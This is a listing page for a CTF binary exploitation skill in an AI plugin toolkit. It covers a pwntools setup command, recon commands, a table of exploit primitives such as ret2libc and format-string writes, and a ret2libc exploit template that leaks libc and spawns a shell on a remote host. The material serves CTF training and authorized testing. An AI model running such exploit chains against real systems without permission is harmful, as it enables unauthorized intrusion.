Stats
Actions
Tags
Help us improve
Share bugs, ideas, or general feedback.
From cybersec-toolkit
Guides through binary exploitation CTF challenges: buffer overflows, ROP, format strings, heap, and kernel pwn. Provides a decision tree, exploit primitive catalog, and pwntools integration.
npx claudepluginhub 26zl/cybersec-toolkit --plugin cybersec-toolkitHow this skill is triggered — by the user, by Claude, or both
Slash command
/cybersec-toolkit:ctf-pwnThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
The MCP server runs pwntools through a dedicated venv at `~/.ctf-venvs/pwntools/`. If missing:
Analyzes ELF binaries for exploitation vectors using checksec, ROPgadget, and pwntools. Covers buffer overflow and ROP chain development for CTF and authorized security assessments.
Analyzes binary exploitation vulnerabilities such as buffer overflows and ROP chains using pwntools, checksec, and ROPgadget for CTF challenges and authorized security assessments.
Analyzes ELF binaries for buffer overflows and ROP chains using pwntools, checksec, and ROPgadget. For CTF challenges and authorized security assessments.
Share bugs, ideas, or general feedback.
The MCP server runs pwntools through a dedicated venv at ~/.ctf-venvs/pwntools/. If missing:
wsl.exe bash -lc "mkdir -p ~/.ctf-venvs && python3 -m venv ~/.ctf-venvs/pwntools && ~/.ctf-venvs/pwntools/bin/pip install pwntools z3-solver"
Then use it: run_script(code, venv="pwntools").
file ./vuln
checksec --file=./vuln # or: rabin2 -I ./vuln
strings ./vuln | head -50
nm ./vuln | head -30 # symbols if not stripped
Note: RELRO, Canary, NX, PIE, arch (x86 / x86_64 / arm / mips), libc version.
If a libc is provided, identify it:
strings libc.so.6 | grep "GNU C Library"
# or
./vuln_pwntools_helper # see below
libc-database and libc-rip/libc.rip (web) — find offsets by leaked function addresses.
Static:
objdump -d -M intel ./vulncutter (radare2 GUI) for decompile — both in registrygets, strcpy, unbounded read, printf(user_input), integer overflow on size, double free, UAFDynamic:
gdb-multiarch ./vuln + pwndbg / gefcyclic 200 → run → crash → cyclic -l <RIP> to find offset| Class | Primitive | Tool |
|---|---|---|
| Stack BOF, no canary, NX off | shellcode | pwntools shellcraft.sh() |
| Stack BOF, NX on, ASLR off | ret2win / static ROP | ROPgadget --binary ./vuln |
| Stack BOF, NX+ASLR, libc leak | ret2libc | leak with PUTS@got, calc system, /bin/sh |
| Stack BOF, NX+ASLR, no leak | ret2plt + puts → leak | classic chain |
| Format string | %n write / %s leak | pwntools fmtstr_payload |
| Heap (glibc) | tcache, fastbin, unsorted bin | how2heap, pwndbg heap |
| Use-after-free | dangling pointer abuse | manual python |
| Kernel | KASLR leak, modprobe_path, etc | manual + qemu |
from pwn import *
context.binary = ELF("./vuln")
libc = ELF("./libc.so.6")
p = remote("host", 1337) # or process("./vuln") for local
# leak
p.sendlineafter(b"> ", b"A" * 40 + p64(elf.plt['puts']) + p64(elf.sym['main']))
leak = u64(p.recvline().strip().ljust(8, b"\x00"))
libc.address = leak - libc.sym['puts']
# pwn
rop = ROP(libc)
rop.raw(rop.find_gadget(['ret'])) # stack align
rop.system(next(libc.search(b"/bin/sh")))
p.sendline(b"A" * 40 + rop.chain())
p.interactive()
pwndbg heap, glibc-all-in-one, how2heap (clone if not present)ROPgadget or roppersystem symbol — check nm firstUse the writeup-template skill. Include the final exploit script verbatim.